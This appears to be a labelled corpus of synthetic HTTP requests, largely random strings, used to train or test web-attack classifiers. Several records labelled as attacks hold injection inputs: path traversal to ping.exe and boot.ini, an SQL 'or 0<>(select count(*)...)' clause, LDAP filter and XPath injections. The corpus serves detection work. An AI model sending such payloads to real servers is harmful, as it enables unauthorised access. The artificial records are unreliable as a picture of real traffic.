X-Forwarded-For: 217.177.147.82
X-Serial-Number: 08031328367563648957
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47739
Start - Id: 34887
class: Valid
PUT /rxmaoeii5glfj6cen1/iKWuXTpBdxuMKu4httCs/8rKq-70FNS2CNLc/nVukavGSjp/hM/nueeitIjiesetod/iBbmt-rl/5Prsterhppoosiallos/iq@JVqMj29oYx53d.mspx? HTTP/1.1
Content-Length: 245
Content-Language: ihelquaI,psi25meg,7
Content-Encoding: compress
Content-Location: http://www.neIndttv.gov/t6seeha/A8meisp/dRYia/6LiEnnto/4CrbHhw.css
Content-MD5: ZUxubHQxdXRycGdmZjVhYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 May 08 22:45:12 CET
Last-Modified: Wed, 07 Nov 07 13:37:58 CET
Host: www.o6fab3Id.biz
Connection: keep-alive
Accept: application/*
Accept-Charset: x-mac-roman, windows-1257;q=0.8, utf-7, euc-kr
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: iozs='ef'
Client-ip: 148.13.5.11
Cookie: betweenwherereplaceV=8xml-@t0dr<hshnq ry;odGnA=1631
Cookie2: $Version="8"
Date: Tue, 28 Oct 08 12:17:01 UTC
ETag: "v_aeITxqGo4O3-8k2YwZ"
Expect: 100-continue
From: aioNe@o85EoEesvN.org
If-Modified-Since: Sat, 13 Aug 05 15:48:34 CET
If-Unmodified-Since: Wed, 14 Mar 07 19:44:38 UTC
If-Match: *
If-None-Match: "Zj@Hh34l@Us3uhyvGUrU"
If-Range: *
Max-Forwards: 4
MIME-Version: 6.5
Pragma: otosm=je8ifdwt
Proxy-Authorization: Digest nc=72e2B70C
Authorization: NTLM NjVzZUxlbllCYVhlcklvQjNlc2V1eWlldGRvbWhlTmF1OW9vMmVlaXNsTGVzcA==
Range: 092889-
Referer: http://2eeocA.de/0a0ub/moOn/esIlaj/eqMvwpi/eopRosdw.htm
TE: deflate;q=0.6,trailers
Trailer: Trailer
User-Agent: Mozilla/9.9 (Windows; U; Windows NT 7.5; yU-mF; rv:9.4.3) Gecko/64883702
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1426x9269
Via: FTP/2.3 www.abdehwaq.html, iibmk/3.0 www.yiss.js, 2.8 171.254.240.47
Transfer-Encoding: identity
Upgrade: minhlz/2.0, gtr/0.2, nusiot/8.5
Warning: 984 www.5sli.jpeg "inisbLIlrtinx" 
X-Forwarded-For: 186.251.191.52
X-Serial-Number: 8380716
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hn=t9gaTdiadrar&EFym9=15475&iinct=r@/&NTAZH1Ee=77&Ja@lchqD8=rr\n&o5UkstpSl=4&rlcs23ehssa6i=oaetc&6ot=;ee7copyQq&x9e2h0e67bw=eceuaReiimtaibsa&_BxLaeFvZn=mre&l6et2tahu=ohetc &hDIerahl44w=ta6gWbrrlgo&pTosLrbsxedco=nT@eDsoeTthtpass5re(ze

End - Id: 34887
Start - Id: 28709
class: Valid
GET /sYY7BtVoHM.jpg?@oceeVJ@=eh&nfsnote=cs&ri7JS=tt&Hnnaje4o=11290&sudopta6dEer=Xia&tbagznreOd2=wou+p&tae=7217&ao8ten=moW9kKOtBIo HTTP/1.1
Host: 0.248.110.31:49
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.8
Accept-Language: rndsunD-gredi;q=0.6, u-ersxH;q=0.7, wl-cig;q=0.1, eltc2-rtls, Xzrcdre-yEphtn;q=0.4
Cache-Control: no-transform
Client-ip: 192.48.51.137
Cookie: olpegx3tEibxu7h=eN.dID5
Cookie2: $Version="0"
Date: Thu, 07 Jun 07 20:19:36 UTC
ETag: "1_X81N@fZdbzotymYITs"
Expect: 100-continue
From: cmNaehb@twerq2.gov
If-Modified-Since: Sat, 07 Feb 04 23:33:16 UTC
If-Unmodified-Since: Sat, 26 Mar 05 12:25:54 UTC
If-Match: "IwuOAntoxuuTp@g2"
If-None-Match: "P3w7YcoqnWFq1nH"
If-Range: *
Max-Forwards: 1
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM dmV5bWFocmthRXJ1bnJmdGVzczNzcHJBZnJoZ25kcmN2RTRhNA==
Authorization: Digest response="DfCbbd7663f97F56C13b9918BD83DF61"
Range: -5
Referer: /8nng/msnbnnio.bin
TE: deflate;q=0.5
Trailer: If-Unmodified-Since
User-Agent: lbaidnAunaswn
UA-CPU: 68000
UA-Disp: 9543,263,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 621x541
Via: 0.9 126.174.166.200, 6.9 www.eonEna.tiff, 3.9 www.lTDn.jpg
Transfer-Encoding: deflate
Upgrade: mptnoI/0.5, iTp4m/8.4, 0hyWd/3.5
Warning: 669 www.arAn.jpg "e3btqt7scal3asb" "Tue, 04 Nov 08 19:20:43 GMT"
X-Forwarded-For: 56.57.58.51
X-Serial-Number: 244229732731
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28709
Start - Id: 44494
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.1
Host: 86.140.200.208
Connection: e06L
Accept: video/*, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: e='dr'
Client-ip: 224.120.218.101
Cookie: rs6U3o0fittstds=887
Cookie2: $Version="7"
Date: Thu, 21 Feb 08 16:19:58 CET
ETag: "brWHOt3l4ea9t1DC"
Expect: 100-continue
From: fo6stv@wTex.net
If-Modified-Since: Wed, 03 Nov 04 01:35:19 GMT
If-Unmodified-Since: Sun, 06 Mar 05 21:44:55 GMT
If-Match: "WESv2dH1wwZ5eQ5Vx@e"
If-None-Match: "7.q_o8Zr@t3oEVZ.si"
If-Range: "v-lub7Me1IPbwi8kUN"
Max-Forwards: 113
MIME-Version: 5.5
Pragma: fzeofL3i=kaer
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: Tnlkti vi8a=htsteu
Range: -80,3-,-9028
Referer: /r4ispif/jt1tdu/iejut.shtml
TE: chunked,trailers,trailers
Trailer: Via
User-Agent: Mozilla/6.8 (Machintosh; U; PPC Mac OS X 3.5; hy-ng; rv:7.7.3) Gecko/01617473
UA-CPU: Sparc
UA-Disp: 3780,9274,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 949x9593
Via: 5.1 110.42.33.9, 2.8 158.35.234.113:79358
Transfer-Encoding: gzip
Upgrade: seea/2.3, ETrs/3.1, npaAp/9.1, aiyne/1.6, odtenh/3.9
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44494
Start - Id: 4037
class: Valid
POST /A8.tiff? HTTP/1.1
Content-Length: 155
Content-Language: T6nnmer
Content-Encoding: gzip
Content-Location: /eaarop/htrer/eoSheu/l7c8cui.tiff
Content-MD5: T09pdGllYWdkYXNuRHIybA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Aug 08 11:55:26 GMT
Last-Modified: Sat, 21 Oct 06 10:19:22 CET
Host: www.Oetlytse.fr:570
Connection: close
Accept: video/quicktime;q=0.5, application/postscript;q=0.1, audio/*
Accept-Charset: iso-8859-7;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 104.15.251.206
Cookie: gepimwtnoldt=c3deoNa8(-;ste=tahl(nc;iws2ttEeus=6;tene=vtcq
Cookie2: $Version="3"
Date: Mon, 08 Nov 04 05:48:46 CET
ETag: "EARCPWdfqe3O8MF0"
Expect: 100-continue
From: o0zM@ffNa.it
If-Modified-Since: Sun, 31 May 09 18:20:49 GMT
If-Unmodified-Since: Sat, 27 Nov 04 18:32:48 CET
If-Match: *
If-None-Match: "LPMwkT@0xExN6rd0i"
If-Range: Tue, 26 Jul 05 24:17:30 CET
Max-Forwards: 409
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: NTLM Z2xhc2FvZWRpdDhvaHRlblM2NWJwdXRobGVpbGFhb2RuZWNMY2FhZXNybTBn
Range: -67
Referer: http://www.5aIoil.be/oss4ri/eriolm.html
TE: trailers
Trailer: Pragma
User-Agent: udHiittaEulyfeis
UA-CPU: PowerPC
UA-Disp: 055,684,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 333x496
Via: HTTP/6.8 www.toe8s.tiff:7980, HTTP/7.4 www.rdlatawm.html, FTP/2.4 www.osjeo.shtml
Transfer-Encoding: deflate
Upgrade: rer/5.5, n4o/6.7, smxl/1.6
Warning: 077 170.228.207.137 "0iuylmonu9ff" 
X-Forwarded-For: 201.143.193.53
X-Serial-Number: 8242203190314
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oFgGUMF7CT-=E49rihne0imehT&riiidwa=txraypo) aEo?aosaservicesis&trEd8iiyqfsv=7371124&D46iA7V3o=edastb&1e=221&p40stl=Aox?access_logleinM&rsratyite=1107

End - Id: 4037
Start - Id: 4930
class: Valid
PUT /3A6-4t/1yxw42BKnvMHC2Xm/oHT@-y7_PrbVnW7DXy/e3FVVORgMtnCKm/ret1/ohts87ttxienn0hiTs1r/iuYBY-/dnpBoo8hRs/3qowbC.mdb? HTTP/1.1
Content-Length: 147
Content-Language: dE6,om
Content-Encoding: deflate
Content-Location: /eani/oagvony/stab/deaNrwea.fgf
Content-MD5: ZXd3OWJ0ZXQ0ZWl0cnhlMg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 26 Mar 09 10:35:59 CET
Last-Modified: Thu, 29 Mar 07 21:55:58 CET
Host: 209.207.184.192:5333
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: nynt=mEHeOeh
Client-ip: 47.100.65.174
Cookie: 3etw=914
Cookie2: $Version="0"
Date: Fri, 28 Nov 08 22:03:15 UTC
ETag: "JYaoY47Q5h@FL5ye"
Expect: 100-continue
From: tsamc1M@it8Et.ch
If-Modified-Since: Tue, 17 Feb 09 16:49:24 CET
If-Unmodified-Since: Thu, 25 Sep 08 12:16:48 UTC
If-Match: *
If-None-Match: *
If-Range: "aOP2vuiUabOHX.HI"
Max-Forwards: 114
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM bmFmcmV0dHR6MWdBdHB0MXVyaWVpajhrZUVpdXQ1ZWNhZGsydQ==
Authorization: Basic c3V0YXRvbzpuaWFnaEN1bw==
Range: -315573,870-
Referer: /a4ecss/ntgews/wai8.mspx
TE: trailers,trailers
Trailer: Expect
User-Agent: dCihm (dJ.wz_.; vyDfABgU@; tst_k1I; eKnSQZBtw)
UA-CPU: 68000
UA-Disp: 979,352,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4223x6180
Via: 2.4 www.hnes1.jpg:344
Transfer-Encoding: gzip
Upgrade: bqdln/8.8, lEme/8.7, iedhiw/5.5
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 172.97.206.77
X-Serial-Number: 81307487513405
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

limbeaetnpG=1&leMrel=R &ena4t7yme=nts :urg&p_ykJ1YK4Ui9=snlooOagtA&si=67hy3itnre&nkenc=/tns&2hrqSv=[m0taaafrom&vneonsek=popaccepttbRn@ ntpi

End - Id: 4930
Start - Id: 13020
class: Valid
GET /ddhOiasdmsenmkanrt/CHjspoe/lseodm6pIenohyptent/Oelsen/iaphjiel6e/O4znu9utxt2hti.nsf? HTTP/1.0
Host: www.erljQih.ch
Connection: close
Accept: video/*, video/quicktime;q=0.0, image/*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: c-1Stb;q=0.6, ssmy-clInN7uE, oi6aLMqj-o;q=0.0, ri-tosm
Cache-Control: mbadlr='r9'
Client-ip: 82.22.221.79
Cookie: et=o|S 
Cookie2: $Version="104"
Date: Sun, 17 Jan 10 24:47:39 CET
ETag: "e24vEhrUhq6Ee1j"
Expect: 100-continue
From: sEo6ola@r8t9rt2n.org
If-Modified-Since: Sat, 20 Jan 07 24:01:51 UTC
If-Unmodified-Since: Thu, 09 Aug 07 22:41:41 CET
If-Match: "sUCj-U4Q4W.vIjPn"
If-None-Match: "w8F4y4NAWJwOq6I2e0Y-"
If-Range: Sat, 31 Jan 04 13:44:47 CET
Max-Forwards: 305
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic YW53aWVhOmRzM21hZWh2
Authorization: hEmo3 gtAictP=eytcrh
Range: 777-8861,-671902,43-427
Referer: http://csitux.ch/alreou7/5cioword/nsnaht.jpg
TE: trailers,deflate,trailers
Trailer: Proxy-Authorization
User-Agent: n2jlaus/2.4
UA-CPU: StrongARM
UA-Disp: 5331,978,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 011x9947
Via: 2.3 156.113.139.87, HTTP/9.4 www.hlnleg.shtml:25
Transfer-Encoding: deflate
Upgrade: zflt/3.2, paby/1.7, ges/5.4, den/9.0, ioa/1.3
Warning: 278 www.2Nmfe.png "0irSv" 
X-Forwarded-For: 229.9.95.131
X-Serial-Number: 72290
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13020
Start - Id: 42575
class: SqlInjection
GET /8MkrQIb4/xnph-nDIvAR1dh4A/mPmgsamaso/bXaT/a9ijDA4L5RlheGiVQur/deaferutnmfnroteo2E/ohdta/sFUO70QdW6Bcqx_/0nMt8arfIBebislo/petaE1ttfapntheo/nLtCqHLw4L.dll?htaccesRi5X2ENyautoexecA=0wf-IAo2e&odshgytwfnnmni=ern2p&itx=eoidh%27%25oe&nm=8exec&snlhnenriezmejr=onlVldslH&i6fgo=or+0%3C%3E%28select+++count%28*%29+from++iiflSmvB%29 HTTP/1.1
Host: www.deeat.st
Connection: keep-alive
Accept: text/html;q=0.1, text/*, video/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: IexDEdn-7cdsthx;q=0.7
Cache-Control: min-fresh=4
Client-ip: 8.53.51.76
Cookie: mEd=42;olhjtaZrNheifce= s+h3ntmpetebetweenTwt=;nwoesIAeyndieti=taw3 ur;W5eF7ZkWYO=3;nsi=1bi]R lh
Cookie2: $Version="6"
Date: Mon, 06 Aug 07 21:01:20 UTC
ETag: "AIbTkMC-@CHeNXLDldey"
Expect: shrot
From: tmTstilr@oerx.it
If-Modified-Since: Mon, 01 Jan 07 20:59:12 UTC
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: "Bj0wV@kwatKawSkqVcj-"
If-None-Match: *
If-Range: Sat, 12 Sep 09 18:10:38 UTC
Max-Forwards: 956
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic Nm9UYWV3c3I6bmUzYQ==
Authorization: NTLM Y2h1bmk4TEJzdGVIZWhIdHJpeWdpc2FhaXRzZHIxblNxZWh1c2Vlb05s
Range: -327,463619-533,09-501926
Referer: /spfcL/eayEraa/stpoah/rtrnhqne.htm
TE: chunked,trailers,gzip;q=0.6
Trailer: From
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 3.8; t5-hc; rv:7.5.0) Gecko/63510352
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x8196
Via: aae/3.5 64.16.68.150, 1.8 www.bimenoc.js, 2.8 www.cyted.shtml:8338
Transfer-Encoding: Asgn
Upgrade: lxiev/4.8, Sc4/5.2, owd/0.5
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 81684
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42575
Start - Id: 37645
class: LdapInjection
POST /haBgKzR7@V0QscBUDkCe/anabalisy/efkYb@qLALuyYYJ/sgObC/oikdavgEinasanenae.bin? HTTP/1.1
Content-Length: 64
Content-Language: 24t,dkrd
Content-Encoding: identity
Content-Location: /jrowxoce/eSnn/AOcen/rbsoonog.cgi
Content-MD5: ZWFpZWRmc2ljMGE0bnNsMA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 May 09 07:42:36 CET
Last-Modified: Sun, 07 Jan 07 21:38:09 GMT
Host: 159.196.34.115
Connection: plYhmn
Accept: image/*, video/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=3283
Client-ip: 76.236.29.239
Cookie: cehboltDsnte=769836639;dNrt=99471;5tzz=309
Cookie2: $Version="67"
Date: Mon, 03 Mar 08 16:11:13 UTC
ETag: "5CsxZ0n_JYvh4GoyRbX"
Expect: nuie
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Wed, 20 Aug 08 12:50:52 UTC
If-Unmodified-Since: Mon, 04 May 09 13:05:50 GMT
If-Match: "2a86Smq_yyQhxw3L"
If-None-Match: "KL.pf_@gZIfH.q8Z"
If-Range: Sat, 14 Jun 08 22:28:16 CET
Max-Forwards: 3
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: /tlve/eormrtey/hrthlhra/osi9hw.txt
TE: chunked
Trailer: TE
User-Agent: Mozilla/6.3 (compatible; Konqueror/3.3; Solaris; lolO; ttdn; aeqrhgh)
UA-CPU: 68000
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 940x1719
Via: 3.8 www.escu6Nen.jpg, HTTP/3.6 www.ewEt.js
Transfer-Encoding: gzip
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 189.116.98.106
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nf7eeikfdwhiga=Oe7t)(    |  (xr4ll=*)&wrboncMr=(ao

End - Id: 37645
Start - Id: 38053
class: LdapInjection
GET /tmeNrLt8lii/5LA2afYA1pXQCTjeCHfO/eoV8WujNpb-Av@15l1.jpg?4fnnlrcnoa=10305830&v0rttaf2en=bqds&5ijeMa0ohi70=056&IeR70TAgsmSp=onf2qX&3ecnhcienate=%29+%28++++%7C++++%28displayName%3Dhad*%29%28name++%3D++++had*%29%28++mail%3Dhad*%29&oahhlnheotynpug=5439878744&8my=9908&royrhubrty=e&cE0tmgteroaiEue=rTGLViwz&oc1hehsi=13&ow=6821&frissaoecrs=w-.gl HTTP/1.1
Host: www.gnuleaian.st
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: us-ascii;q=0.8, iso-8859-8, x-mac-chinesesimp;q=0.2
Accept-Encoding: 
Accept-Language: e9ruam-d4;q=0.7, aofumenx-meh;q=0.2, EtcA-tedatlTr;q=0.5, e8Se6sa-uE, kny-hst;q=0.3
Cache-Control: max-stale
Client-ip: 26.50.164.170
Cookie: ci3SNkutH2Kvse=rstprocessing-instructionA1F=echoa;f4eest=t:D(u8l ohu;ess=d0a7hpi8n
Cookie2: $Version="54"
Date: Wed, 10 Dec 08 21:07:54 CET
ETag: W/"pCp.CzRLn0H9BK8"
Expect: oTo0xsi=menaree;nEnewski
From: iaoHwaa@inosaaos.gov
If-Modified-Since: Wed, 19 Aug 09 13:49:09 GMT
If-Unmodified-Since: Sun, 27 Jun 04 20:53:02 UTC
If-Match: "C-FHXRU04yRTEm0qt0n"
If-None-Match: *
If-Range: *
Max-Forwards: 196
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest qop=msgie5
Range: 6583-,350-4,-7502
Referer: /zgsses.wav
TE: deflate
Trailer: Warning
User-Agent: Mozilla/3.4 (X11; U; Unix 9.7; hi-he; rv:6.6.4) Gecko/18876186
UA-CPU: x86
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: 5.9 www.oiz2bStK.css, HTTP/2.1 www.sOhtigne.tiff
Transfer-Encoding: identity
Upgrade: omsS/1.9, atcm2/9.8, htuh6/0.3, roto/0.9, ttttRe/7.7
Warning: 211 5.85.253.98 "saoadsette" 
X-Forwarded-For: 233.230.195.96
X-Serial-Number: 94095568311644
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38053
Start - Id: 12804
class: Valid
GET /OiehDm/htpnnto3tda/m8TSrSw5H_zRGoZ9J/aOKJr3Ig@coIZ9ub.tiff? HTTP/1.1
Host: 232.212.41.64
Connection: e1Hjaj
Accept: audio/*, video/quicktime;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: rmatNAs-rrmmluhn;q=0.1, eND-5o;q=0.3, hwoRwgN-aesbcy7, receq32-ntnlnu;q=0.1, innorrg-dsccelr;q=0.3
Cache-Control: uatm=hEr
Client-ip: 112.71.203.72
Cookie: 7etesm=terIre
Cookie2: $Version="21"
Date: Mon, 10 Mar 08 19:56:38 GMT
ETag: W/"TO9dma-74eTY_Nh.mH"
Expect: 100-continue
From: tibfhrt@6ra7.com
If-Modified-Since: Wed, 12 Aug 09 08:47:07 UTC
If-Unmodified-Since: Sun, 20 Apr 08 10:33:05 CET
If-Match: "CXR9HXu36a.SwNs@0X2"
If-None-Match: "__V_srYj1@jMAdG7Po"
If-Range: Thu, 19 Feb 09 12:18:19 GMT
Max-Forwards: 7695
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest response="85419DBEdBCB9A5a6cea943BA73FBdaC"
Range: 880687-,10-
Referer: http://www.ooirec.com/af50t.bin
TE: trailers
Trailer: Accept-Charset
User-Agent: eeryct
UA-CPU: Sparc
UA-Disp: 718,169,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8634x945
Via: HTTP/2.0 www.uwscov.html:20316, 4.3 www.qdje.css, 1.4 www.tit1koeh.shtml
Transfer-Encoding: compress
Upgrade: DoR/2.1, rahogo/2.6
Warning: 738 www.mdRbith.jpeg "5erngdnraionsLeaa6n" 
X-Forwarded-For: 129.36.3.102
X-Serial-Number: 392683968
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12804
Start - Id: 45931
class: PathTransversal
GET /oAB-nOg/mEeobH7erP814rro3l/Tcfgobgo6t/eegchtet8gp.jpeg?wcit9eek=aipectmtctn&tIrh4s=v%3A%5Cwinnt%5Cboot.ini HTTP/1.1
Host: www.miete2.fr:010
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i, koi8-r;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: iraa-lh;q=0.5
Cache-Control: min-fresh=25316
Cookie2: $Version="239"
Date: Tue, 08 Aug 06 12:37:21 UTC
ETag: "Ca_yu_NEHO-vKja"
From: 4atol@lig1.ch
If-Modified-Since: Thu, 25 Mar 10 10:19:39 CET
If-None-Match: "pCV7_RHQnEZ3Wfi"
Max-Forwards: 0
Authorization: 4mOu esue=wnsan5
Referer: http://aateto.net/rihttu/lToledt.cgi
User-Agent: nexdsi
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: 7.3 www.atpuag.js, FTP/5.0 248.70.109.20, 5.7 www.zOiTt.css
Transfer-Encoding: telre
Warning: 620 www.godtodAm.js "bowantsa4enlgyhci" "Fri, 16 Oct 09 01:24:43 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45931
Start - Id: 26253
class: Valid
GET /05tErotic2ff/l1ap/hjMnh/rQeBN_LgSEEdnT5x@1.png?otil=oaVco%2B&0kt4tOwonae=hA-N0TU%40QR&arHs=ab&2sr=277279&K1cn5sKKA0hposition=%7Erc+&iinfexdt=tud&gu=tnsetcncyu6e&rim9nS0snmssCEu=t%40HhBdnWxJKw HTTP/1.1
Host: www.helOevld.be:230
Connection: saela
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.1, gzip;q=0.9, gzip, identity
Accept-Language: y-otnlilc, 4aqeymma-ridheeot, 8s-l8aTenta, Dms6ltt-astr, ubvy-r;q=0.9
Cache-Control: no-cache
Client-ip: 70.146.111.185
Cookie: alelneie=osmR;alU=x0aro|;al=655460655;aylnb1etasD=m);brat=neN;tm=avQ_At9UAr@
Cookie2: $Version="197"
Date: Wed, 17 Jan 07 23:09:39 CET
ETag: W/"PahjqMqeR_i92PJxyGq"
Expect: igoe3
From: nFledhng@FadgstE.de
If-Modified-Since: Fri, 02 Nov 07 05:01:21 UTC
If-Unmodified-Since: Thu, 16 Feb 06 14:35:27 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Sep 09 11:54:07 UTC
Max-Forwards: 2
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://ismiws.org/bltnhue/eeeeezo.gif
Authorization: NTLM YWFscG5lbk1paW5IdXVseHRoc3ljcmx5bTdibDRlaXBrZXJ0T2VwSHVSaGFv
Range: 47781-
Referer: /eIashkan/equ9dssa/gemtroet/Hliis9.png
TE: trailers,gzip;q=0.6
Trailer: Referer
User-Agent: uAe9hesteu/5.3.4
UA-CPU: Sparc
UA-Disp: 9474,169,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 857x6835
Via: 8.8 www.inSbo4.js, dAlezt/5.4 www.yAumergt.tiff
Transfer-Encoding: ysno; EeeRu=gtrn
Upgrade: geoaa/5.5, tnh/2.0, wawlno/4.1
Warning: 523 www.fcafY9.gif "ilbdchn" "Thu, 14 Aug 08 02:13:15 GMT"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 4037485153
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26253
Start - Id: 35565
class: XPathInjection
PUT /xZV.Lh_d/IeothrbveN/aVfkstsg_Pj6/reJP12stGHXR7P.jpeg? HTTP/1.1
Content-Length: 278
Content-Language: seolihd,2
Content-Encoding: compress
Content-Location: /s16e/entd4t3A/w4es.rar
Content-MD5: ZTVjQ3djdWl1dHdnamplZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Sep 09 19:00:17 GMT
Last-Modified: Wed, 24 Mar 04 04:01:18 CET
Host: 204.166.161.81
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1251, x-mac-hebrew;q=0.1, iso-8859-8-i;q=0.2, windows-1253, iso-8859-15
Accept-Encoding: gzip;q=0.6, identity, compress;q=0.7
Accept-Language: *;q=0.7
Cache-Control: min-fresh=02
Client-ip: 91.74.181.149
Cookie: NRf2exec9=64243;roenFtjogaaieR=9nsoesa5nayme5lo;sa9otdec=ltndekf3hpasswdvar10drehomed
Cookie2: $Version="43"
Date: Thu, 11 Mar 04 06:06:00 UTC
ETag: W/"OHA@HXW9tVHSMsudgg"
Expect: 100-continue
From: wp5sjfh@o8nst.uk
If-Modified-Since: Sun, 22 Oct 06 18:10:12 CET
If-Unmodified-Since: Sat, 25 Apr 09 23:09:05 CET
If-Match: *
If-None-Match: *
If-Range: "uf7azlJ_kVfg3dgG87"
Max-Forwards: 35
MIME-Version: 5.3
Pragma: ghnAvt9=dren9
Proxy-Authorization: bdogr iaezsane=oolt
Authorization: Basic c3N0aTp0b2tk
Range: -1,-1839
Referer: /nsiti/rterom/neDai.mdb
TE: deflate;q=0.5,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/8.0 (compatible; MSIE 8.6; Unix; ejmedse)
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6021x6511
Via: 6.0 www.zDnedde.htm
Transfer-Encoding: deflate
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 111 66.147.23.225 "Ce1Nw" "Thu, 19 Mar 09 19:56:10 UTC"
X-Forwarded-For: 219.76.123.80
X-Serial-Number: 42337082181389056
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9dt=qbzt)&j9t9=8kVwjIar&aUedI=dyvrl2tehwc&m2wtOeih7udnas=tPEo&d1doIuk=8ry&rjrcTtOeaArlh6o=7&0rWvXopen=(i    <  count(l2oi4b/child::text()) and   j <    count(hgwn0p/child::comment())     and   k  <     count(68eu/child::*)     )

End - Id: 35565
Start - Id: 14623
class: Valid
